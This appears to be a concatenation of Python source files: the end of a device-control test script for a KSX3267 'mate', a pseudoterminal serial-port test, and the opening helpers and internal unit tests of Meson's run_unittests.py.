#{"id" : "205", "dk" : (2,40241,["opid","status"],45041,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "206", "dk" : (2,40251,["opid","status"],45051,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "207", "dk" : (2,40261,["opid","status"],45061,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "208", "dk" : (2,40271,["opid","status"],45071,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "209", "dk" : (2,40281,["opid","status"],45081,["operation","opid"]), "dt": "act/switch/level0"}
]
}, {
"id" : "301", "dk" : (3,40201,["opid","status"],45001,["operation","opid"]), "dt": "nd", "children" : [
{"id" : "302", "dk" : (3,40211,["opid","status"],45011,["operation","opid"]), "dt": "act/retractable/level0"},
{"id" : "303", "dk" : (3,40221,["opid","status"],45021,["operation","opid"]), "dt": "act/retractable/level0"},
{"id" : "304", "dk" : (3,40231,["opid","status"],45031,["operation","opid"]), "dt": "act/retractable/level0"},
{"id" : "305", "dk" : (3,40241,["opid","status"],45041,["operation","opid"]), "dt": "act/retractable/level0"}
]
}]
}]
"""
if isnutri:
kdmate = KSX3267MateV2(opt, nutriinfo, "1", None)
else:
kdmate = KSX3267MateV2(opt, devinfo, "1", None)
mate = Mate ({}, [], "1", None)
kdmate.start (mate.writeblk)
print "mate started"
time.sleep(10)
req = Request(None)
req.setcommand("1", CmdCode.DETECT_DEVICE, None)
print "=======================================#1"
kdmate.writeblk(req)
print "=======================================#1"
"""
time.sleep(1)
req = Request(None)
req.setcommand("1", CmdCode.CANCEL_DETECT, {})
print "=======================================#2"
kdmate.writeblk(req)
print "=======================================#2"
time.sleep(1)
req = Request(None)
req.setcommand("1", CmdCode.DETECT_DEVICE, None)
print "=======================================#3"
kdmate.writeblk(req)
print "=======================================#3"
time.sleep(1)
req = Request(None)
req.setcommand("1", CmdCode.CANCEL_DETECT, {})
print "=======================================#4"
kdmate.writeblk(req)
print "=======================================#4"
time.sleep(10)
req = Request(201)
req.setcommand(202, CmdCode.OPEN, {})
kdmate.writeblk(req)
time.sleep(5)
req = Request(201)
req.setcommand(202, CmdCode.OFF, {})
kdmate.writeblk(req)
time.sleep(10)
req = Request(201)
req.setcommand(202, CmdCode.TIMED_OPEN, {"time":10})
kdmate.writeblk(req)
time.sleep(15)
req = Request(201)
req.setcommand(202, CmdCode.TIMED_CLOSE, {"time":10})
kdmate.writeblk(req)
time.sleep(5)
req = Request(201)
req.setcommand(202, CmdCode.OFF, {})
kdmate.writeblk(req)
"""
time.sleep(30)
kdmate.stop()
print "mate stopped"
|
porttest.py
|
import os, pty
from serial import Serial
import threading
def listener(port):
#continuously listen to commands on the master device
while 1:
res = b""
while not res.endswith(b"\r\n"):
#keep reading one byte at a time until we have a full line
res += os.read(port, 1)
print("command: %s" % res)
#write back the response
if res == b'QPGS\r\n':
os.write(port, b"correct result\r\n")
else:
os.write(port, b"I dont understand\r\n")
def test_serial():
"""Start the testing"""
master,slave = pty.openpty() #open the pseudoterminal
s_name = os.ttyname(slave) #translate the slave fd to a filename
#create a separate thread that listens on the master device for commands
thread = threading.Thread(target=listener, args=[master])
thread.start()
#open a pySerial connection to the slave
ser = Serial(s_name, 2400, timeout=1)
ser.write(b'test2\r\n') #write the first command
res = b""
while not res.endswith(b'\r\n'):
#read the response
res +=ser.read()
print("result: %s" % res)
ser.write(b'QPGS\r\n') #write a second command
res = b""
while not res.endswith(b'\r\n'):
#read the response
res +=ser.read()
print("result: %s" % res)
if __name__=='__main__':
test_serial()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', '[email protected]'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@[email protected]', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@[email protected]', '@[email protected]', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@[email protected]', '@[email protected]', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@[email protected]', '@[email protected]', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@[email protected]', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
